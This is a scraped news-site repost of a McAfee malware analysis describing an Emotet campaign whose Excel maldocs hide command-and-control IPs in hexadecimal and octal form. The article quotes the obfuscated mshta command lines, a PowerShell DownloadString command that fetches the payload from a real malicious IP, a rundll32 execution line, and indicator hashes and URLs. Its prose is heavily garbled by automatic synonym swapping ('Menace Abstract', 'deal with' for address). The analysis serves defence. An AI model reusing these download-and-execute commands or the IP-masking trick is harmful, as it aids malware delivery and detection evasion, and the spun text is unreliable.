• DMCA
  • Disclaimer
  • Terms and Conditions
  • Cookie Privacy Policy
  • Privacy Policy
  • Contact
  • Advertise
  • Home
  • Review
    SoftBank, Sequoia China back this ERP startup enabling China’s online exporters – TechCrunch

    SoftBank, Sequoia China back this ERP startup enabling China’s online exporters – TechCrunch

    Helbiz reports revenue increase but dwindling cash reserves – TechCrunch

    Helbiz reports revenue increase but dwindling cash reserves – TechCrunch

    Mycel’s mushroom-based biomaterials sprout M in funding – TechCrunch

    Mycel’s mushroom-based biomaterials sprout $10M in funding – TechCrunch

    First look at del Toro’s Cabinet of Curiosities is magically macabre

    First look at del Toro’s Cabinet of Curiosities is magically macabre

    CDC to regain control of US hospital data after Trump-era seizure, chaos

    CDC to regain control of US hospital data after Trump-era seizure, chaos

    As Big Tech grapples with caste-based discrimination, Apple explicitly bans it

    As Big Tech grapples with caste-based discrimination, Apple explicitly bans it

  • Gaming
    NBA Star Zion Williamson Says ‘80%’ Of Players Are Into Anime

    NBA Star Zion Williamson Says ‘80%’ Of Players Are Into Anime

    Madden 23 Early Access MUT Challenges – How To Unlock Bonus Coins With EA Play

    Madden 23 Early Access MUT Challenges – How To Unlock Bonus Coins With EA Play

    Fortnite’s Dragon Ball Super event leak, showing Goku, Vegeta, and more

    Fortnite’s Dragon Ball Super event leak, showing Goku, Vegeta, and more

    Diablo III Season 27 – The Light’s Calling Begins August 26

    Diablo III Season 27 – The Light’s Calling Begins August 26

    John Wick prequel show set to debut on Peacock in 2023

    John Wick prequel show set to debut on Peacock in 2023

    Sony’s PS4 Sold More Than Twice As Well As Microsoft’s Xbox One

    Sony’s PS4 Sold More Than Twice As Well As Microsoft’s Xbox One

  • Gear
    • All
    • Audio
    • Camera
    • Laptop
    • Smartphone
    B&H Weekly Deals – Newsshooter

    B&H Weekly Deals – Newsshooter

    Next low-cost iPad to launch alongside M2 iPad Pro in October

    Next low-cost iPad to launch alongside M2 iPad Pro in October

    The MOST IMPORTANT thing in Mixing (isn’t what you think it is…) — SonicScoop

    The MOST IMPORTANT thing in Mixing (isn’t what you think it is…) — SonicScoop

    Deal: First 0 price drop on the Sony Xperia Pro-I

    Deal: First $600 price drop on the Sony Xperia Pro-I

    Android 13 is officially here, updates for Pixels start today

    Android 13 is officially here, updates for Pixels start today

    Best deals today: Microsoft’s Surface Laptop Studio, Sony’s Xperia PRO-I, and more

    Best deals today: Microsoft’s Surface Laptop Studio, Sony’s Xperia PRO-I, and more

    Trending Tags

    • Best iPhone 7 deals
    • Apple Watch 2
    • Nintendo Switch
    • CES 2017
    • Playstation 4 Pro
    • iOS 10
    • iPhone 7
    • Sillicon Valley
  • Computers
    Monoprice Horizon TrueWireless ANC Earbuds

    Monoprice Horizon TrueWireless ANC Earbuds

    Podcast #689 – Ryzen 7000 RAM Speed, NVIDIA’s Bad Quarter, Intel Arc Pro GPUs, Hackaday Prizes, Quantum Computing Fail and MORE

    Podcast #689 – Ryzen 7000 RAM Speed, NVIDIA’s Bad Quarter, Intel Arc Pro GPUs, Hackaday Prizes, Quantum Computing Fail and MORE

    Another SFF From Geekom, MiniAir 11

    Another SFF From Geekom, MiniAir 11

    Patriot Viper VPR400, 1TB Of RGBs

    Patriot Viper VPR400, 1TB Of RGBs

    All New Rescuezilla 2.4, And New-ish Redo Rescue Too!

    All New Rescuezilla 2.4, And New-ish Redo Rescue Too!

    Google Decided To Drop The Silly Answers, Not The Evil

    Google Decided To Drop The Silly Answers, Not The Evil

  • Applications
    Severance and Ted Lasso take home seven HCA TV awards

    Severance and Ted Lasso take home seven HCA TV awards

    Apple corporate workers have to return to the office by September 5

    Apple corporate workers have to return to the office by September 5

    Apple TV+ releases first look at Shantaram, its upcoming drama starring Charlie Hunnam

    Apple TV+ releases first look at Shantaram, its upcoming drama starring Charlie Hunnam

    Apple TV+ debuts official trailer for Life By Ella, a new family series

    Apple TV+ debuts official trailer for Life By Ella, a new family series

    Canva Unveils New Infinite Whiteboards Features

    Canva Unveils New Infinite Whiteboards Features

    Snapchat+ hits 1 million subscribers, announces new exclusive features

    Snapchat+ hits 1 million subscribers, announces new exclusive features

  • Security
    Hackers Come Home to Vibrant Community

    Hackers Come Home to Vibrant Community

    Most Q2 Attacks Targeted Old Microsoft Vulnerabilities

    Most Q2 Attacks Targeted Old Microsoft Vulnerabilities

    Transitioning From VPNs to Zero-Trust Access Requires Shoring Up Third-Party Risk Management

    Transitioning From VPNs to Zero-Trust Access Requires Shoring Up Third-Party Risk Management

    Software Patches Flaw on macOS Could Let Hackers Bypass All Security Levels

    Software Patches Flaw on macOS Could Let Hackers Bypass All Security Levels

    Luckymouse Uses Compromised MiMi Chat App to Target Windows and Linux Systems

    Luckymouse Uses Compromised MiMi Chat App to Target Windows and Linux Systems

    Dutch Authorities Arrest Tornado Cash Developer Following U.S. Sanctions on Crypto Mixer Firm

    Dutch Authorities Arrest Tornado Cash Developer Following U.S. Sanctions on Crypto Mixer Firm

No Result
View All Result
  • Home
  • Review
    SoftBank, Sequoia China back this ERP startup enabling China’s online exporters – TechCrunch

    SoftBank, Sequoia China back this ERP startup enabling China’s online exporters – TechCrunch

    Helbiz reports revenue increase but dwindling cash reserves – TechCrunch

    Helbiz reports revenue increase but dwindling cash reserves – TechCrunch

    Mycel’s mushroom-based biomaterials sprout M in funding – TechCrunch

    Mycel’s mushroom-based biomaterials sprout $10M in funding – TechCrunch

    First look at del Toro’s Cabinet of Curiosities is magically macabre

    First look at del Toro’s Cabinet of Curiosities is magically macabre

    CDC to regain control of US hospital data after Trump-era seizure, chaos

    CDC to regain control of US hospital data after Trump-era seizure, chaos

    As Big Tech grapples with caste-based discrimination, Apple explicitly bans it

    As Big Tech grapples with caste-based discrimination, Apple explicitly bans it

  • Gaming
    NBA Star Zion Williamson Says ‘80%’ Of Players Are Into Anime

    NBA Star Zion Williamson Says ‘80%’ Of Players Are Into Anime

    Madden 23 Early Access MUT Challenges – How To Unlock Bonus Coins With EA Play

    Madden 23 Early Access MUT Challenges – How To Unlock Bonus Coins With EA Play

    Fortnite’s Dragon Ball Super event leak, showing Goku, Vegeta, and more

    Fortnite’s Dragon Ball Super event leak, showing Goku, Vegeta, and more

    Diablo III Season 27 – The Light’s Calling Begins August 26

    Diablo III Season 27 – The Light’s Calling Begins August 26

    John Wick prequel show set to debut on Peacock in 2023

    John Wick prequel show set to debut on Peacock in 2023

    Sony’s PS4 Sold More Than Twice As Well As Microsoft’s Xbox One

    Sony’s PS4 Sold More Than Twice As Well As Microsoft’s Xbox One

  • Gear
    • All
    • Audio
    • Camera
    • Laptop
    • Smartphone
    B&H Weekly Deals – Newsshooter

    B&H Weekly Deals – Newsshooter

    Next low-cost iPad to launch alongside M2 iPad Pro in October

    Next low-cost iPad to launch alongside M2 iPad Pro in October

    The MOST IMPORTANT thing in Mixing (isn’t what you think it is…) — SonicScoop

    The MOST IMPORTANT thing in Mixing (isn’t what you think it is…) — SonicScoop

    Deal: First 0 price drop on the Sony Xperia Pro-I

    Deal: First $600 price drop on the Sony Xperia Pro-I

    Android 13 is officially here, updates for Pixels start today

    Android 13 is officially here, updates for Pixels start today

    Best deals today: Microsoft’s Surface Laptop Studio, Sony’s Xperia PRO-I, and more

    Best deals today: Microsoft’s Surface Laptop Studio, Sony’s Xperia PRO-I, and more

    Trending Tags

    • Best iPhone 7 deals
    • Apple Watch 2
    • Nintendo Switch
    • CES 2017
    • Playstation 4 Pro
    • iOS 10
    • iPhone 7
    • Sillicon Valley
  • Computers
    Monoprice Horizon TrueWireless ANC Earbuds

    Monoprice Horizon TrueWireless ANC Earbuds

    Podcast #689 – Ryzen 7000 RAM Speed, NVIDIA’s Bad Quarter, Intel Arc Pro GPUs, Hackaday Prizes, Quantum Computing Fail and MORE

    Podcast #689 – Ryzen 7000 RAM Speed, NVIDIA’s Bad Quarter, Intel Arc Pro GPUs, Hackaday Prizes, Quantum Computing Fail and MORE

    Another SFF From Geekom, MiniAir 11

    Another SFF From Geekom, MiniAir 11

    Patriot Viper VPR400, 1TB Of RGBs

    Patriot Viper VPR400, 1TB Of RGBs

    All New Rescuezilla 2.4, And New-ish Redo Rescue Too!

    All New Rescuezilla 2.4, And New-ish Redo Rescue Too!

    Google Decided To Drop The Silly Answers, Not The Evil

    Google Decided To Drop The Silly Answers, Not The Evil

  • Applications
    Severance and Ted Lasso take home seven HCA TV awards

    Severance and Ted Lasso take home seven HCA TV awards

    Apple corporate workers have to return to the office by September 5

    Apple corporate workers have to return to the office by September 5

    Apple TV+ releases first look at Shantaram, its upcoming drama starring Charlie Hunnam

    Apple TV+ releases first look at Shantaram, its upcoming drama starring Charlie Hunnam

    Apple TV+ debuts official trailer for Life By Ella, a new family series

    Apple TV+ debuts official trailer for Life By Ella, a new family series

    Canva Unveils New Infinite Whiteboards Features

    Canva Unveils New Infinite Whiteboards Features

    Snapchat+ hits 1 million subscribers, announces new exclusive features

    Snapchat+ hits 1 million subscribers, announces new exclusive features

  • Security
    Hackers Come Home to Vibrant Community

    Hackers Come Home to Vibrant Community

    Most Q2 Attacks Targeted Old Microsoft Vulnerabilities

    Most Q2 Attacks Targeted Old Microsoft Vulnerabilities

    Transitioning From VPNs to Zero-Trust Access Requires Shoring Up Third-Party Risk Management

    Transitioning From VPNs to Zero-Trust Access Requires Shoring Up Third-Party Risk Management

    Software Patches Flaw on macOS Could Let Hackers Bypass All Security Levels

    Software Patches Flaw on macOS Could Let Hackers Bypass All Security Levels

    Luckymouse Uses Compromised MiMi Chat App to Target Windows and Linux Systems

    Luckymouse Uses Compromised MiMi Chat App to Target Windows and Linux Systems

    Dutch Authorities Arrest Tornado Cash Developer Following U.S. Sanctions on Crypto Mixer Firm

    Dutch Authorities Arrest Tornado Cash Developer Following U.S. Sanctions on Crypto Mixer Firm

No Result
View All Result
No Result
View All Result
Home Security

Emotet’s Uncommon Approach of Masking IP Addresses

RealHacker Staff by RealHacker Staff
February 26, 2022
Emotet’s Uncommon Approach of Masking IP Addresses
Share on FacebookShare on Twitter


Authored By: Kiran Raj

In a current marketing campaign of Emotet, McAfee Researchers noticed a change in methods. The Emotet maldoc was utilizing hexadecimal and octal codecs to symbolize IP deal with which is often represented by decimal codecs. An instance of that is proven under:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This variation in format would possibly evade some AV merchandise counting on command line parameters however McAfee was nonetheless in a position to shield our prospects. This weblog explains this new approach.

Determine 1: Picture of An infection map for EMOTET Maldoc as noticed by McAfee

Menace Abstract

  1. The preliminary assault vector is a phishing e mail with a Microsoft Excel attachment. 
  2. Upon opening the Excel doc and enabling modifying, Excel executes a malicious JavaScript from a server by way of mshta.exe 
  3. The malicious JavaScript additional invokes PowerShell to obtain the Emotet payload. 
  4. The downloaded Emotet payload might be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Evaluation

Under is the picture (determine 2) of the preliminary worksheet opened in excel. We are able to see some hidden worksheets and a social engineering message asking customers to allow content material. By enabling content material, the person permits the malicious code to run.

On analyzing the excel spreadsheet additional, we are able to see a number of cell addresses added within the Named Supervisor window. Cells talked about within the Auto_Open worth might be executed mechanically leading to malicious code execution.

Figure 3- Named Manager and Auto_Open triggers
Determine 3- Named Supervisor and Auto_Open triggers

Under are the instructions utilized in Hexadecimal and Octal variants of the Maldocs

FORMAT OBFUSCATED CMD DEOBFUSCATED CMD
Hexadecimal cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html http://185[.]7[.]214[.]7/fer/fer.html
Octal cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to obtain and run the malicious JavaScript which is inside an html file.

Figure 4: Process tree of excel execution
Determine 4: Course of tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on browser
Determine 5- Picture of HTML web page seen on a browser

The Malicious JavaScript invokes PowerShell to obtain the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the next path “C:UsersPublicDocumentsssd.dll”.

cmd line (New-Object Internet.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line cmd  /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString

IOC

TYPE VALUE SCANNER DETECTION NAME
XLS 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c McAfee LiveSafe and Whole Safety X97M/Downloader.nn
DLL a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 McAfee LiveSafe and Whole Safety

 

Emotet-FSY
HTML URL http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor Blocked
DLL URL http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor Blocked

MITRE ATT&CK

TECHNIQUE ID TACTIC TECHNIQUE DETAILS DESCRIPTION
T1566 Preliminary entry Phishing attachment Preliminary maldoc makes use of phishing strings to persuade customers to open the maldoc
T1204 Execution Person Execution Handbook execution by person
T1071 Command and Management Normal Utility Layer Protocol Makes an attempt to attach by HTTP
T1059 Command and Scripting Interpreter Begins CMD.EXE for instructions execution Excel makes use of cmd and PowerShell to execute command
T1218

 

Signed Binary Proxy Execution Makes use of RUNDLL32.EXE and MSHTA.EXE to load library rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Workplace paperwork have been used as an assault vector for a lot of malware households in current instances. The Menace Actors behind these households are continuously altering their methods with the intention to try to evade detection. McAfee Researchers are continuously monitoring the Menace Panorama to determine these adjustments in methods to make sure our prospects keep protected and may go about their day by day lives with out having to fret about these threats.





Source link

Related

Tags: addressesApproachEmotetsmaskingUncommon
RealHacker Staff

RealHacker Staff

Recent Posts

  • B&H Weekly Deals – Newsshooter
  • Severance and Ted Lasso take home seven HCA TV awards
  • SoftBank, Sequoia China back this ERP startup enabling China’s online exporters – TechCrunch
  • NBA Star Zion Williamson Says ‘80%’ Of Players Are Into Anime
  • Helbiz reports revenue increase but dwindling cash reserves – TechCrunch
  • Next low-cost iPad to launch alongside M2 iPad Pro in October
  • Apple corporate workers have to return to the office by September 5
  • Mycel’s mushroom-based biomaterials sprout $10M in funding – TechCrunch

Follow Us

Categories

  • Applications
  • Audio
  • Camera
  • Computers
  • Gaming
  • Gear
  • Laptop
  • Metaverse
  • Microsoft
  • Photography
  • Review
  • Security
  • Smartphone
  • Uncategorized

Recent News

B&H Weekly Deals – Newsshooter

B&H Weekly Deals – Newsshooter

August 15, 2022
Severance and Ted Lasso take home seven HCA TV awards

Severance and Ted Lasso take home seven HCA TV awards

August 15, 2022
  • DMCA
  • Disclaimer
  • Terms and Conditions
  • Cookie Privacy Policy
  • Privacy Policy
  • Contact
  • Advertise

© 2019 - theme develop by real hacker news.

No Result
View All Result
  • Home
  • Review
  • Gaming
  • Gear
  • Computers
  • Applications
  • Security

© 2019 - theme develop by real hacker news.

error: Content is protected !!